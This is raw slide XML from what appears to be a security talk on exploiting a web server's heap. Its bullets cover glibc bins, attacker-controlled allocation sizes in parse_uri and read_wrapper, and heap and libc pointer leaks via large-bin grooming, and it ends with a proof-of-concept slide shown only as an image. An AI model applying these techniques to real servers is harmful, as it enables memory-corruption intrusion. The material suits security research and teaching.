                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> leak </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Other bins NEXT to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Chunk will consolidate with top chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Generic bin diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E4781B1-B070-3944-B129-E4980E6C7008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752761" y="2778710"/>
            <a:ext cx="1996459" cy="2123893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C57AAC47-CAA0-3240-BB64-DC18F190ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5469652" y="348449"/>
            <a:ext cx="2949178" cy="1200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rgbClr val="177CC0"/>
                </a:solidFill>
                <a:latin typeface="Avenir Medium"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Avenir Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4D8FD6-A0C9-7944-8940-A1899FE28920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706171" y="1543052"/>
            <a:ext cx="4279510" cy="28586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Avenir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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venir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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venir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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venir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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venir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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Use chunks larger than 0x410 in size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Allocate &amp; free target chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>early</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CA94EC-BC29-1441-A2CD-DF3BBA553EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3579019" y="1695635"/>
            <a:ext cx="112715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4038A6-25FE-FE4E-8B93-2084255844A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4057095" y="2246050"/>
            <a:ext cx="719091" cy="7102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139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2BBD-F30A-AB41-9979-E4E79F8D6694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Allocation Primitives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C7BABC-6FD0-3C40-80DA-5DFCBA7F8023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271220" y="1236540"/>
            <a:ext cx="7886700" cy="3761587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>read_wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Partially controlled size </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x10, 0x20…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>0x1000, 0x2000, 0x4000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocates the buffer THEN frees. Not next to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>top chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query parameters in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parse_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Key/Value length is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>allocation size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>by us (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>local_cpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Frees at the END of this call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url_decode</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a:t> similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>read_wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x40, 0x80…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x800, 0x1000, 0x2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2872772-1B23-FF46-8FE6-A76063A9757C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="84554" y="4346773"/>
            <a:ext cx="8974892" cy="796727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9220251-C6A7-8048-9818-4D26BA4E156C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4838605"/>
            <a:ext cx="94991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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C64C972-6775-5F43-A6DB-16FE71780413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5143500"/>
            <a:ext cx="94991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271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1E97-2B0F-EF40-AE19-E5C1A32BDC3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large URL/Parameters = Groomed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A69F52DA-497E-4549-B6A0-27A19484FE9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="5656740" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates HUGE chunks for us to allocate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunks put into large bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘fd’ points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd_nextsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ points to Heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> leak 🔥</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Large bin chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF43C9D5-5ADA-C447-AC5E-2AF3A6B56130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038102" y="1079584"/>
            <a:ext cx="1459283" cy="3633112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9E35EFC-0953-0E40-A96F-DF4028B9133C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6868448" y="2715363"/>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ype confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1A0591-17D2-B942-B026-7FB7288B7AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6868448" y="3967660"/>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descr="Large chunk allocation">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96BF8929-6A1A-8F4F-8AEA-03DCF770CD98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1356905" y="3159792"/>
            <a:ext cx="4200229" cy="1898409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1BCE912-1A37-E64A-92F9-AF82E9E4D968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738635" y="4190536"/>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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC2CCE04-B15B-0D4A-89C4-45E88E294E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2830588" y="4712696"/>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436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9129-1A19-966B-CED0-4060E1330887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POC || GTFO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DB5B61-5EB4-15C5-C3EA-60D40652605D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>﻿</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8F349B5-824E-8F40-06C5-91A8F960ED88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2384869"/>
            <a:ext cx="4572000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>﻿</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Exploit payload for initialized memory leak">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0736D63E-10C8-E50E-A26B-588C011048DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1361901"/>
            <a:ext cx="9144000" cy="2419697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CBA4FBC-54FE-4644-4862-FF3AF0309156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1495647" y="1606205"/>
            <a:ext cx="14692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5503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1E97-2B0F-EF40-AE19-E5C1A32BDC3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
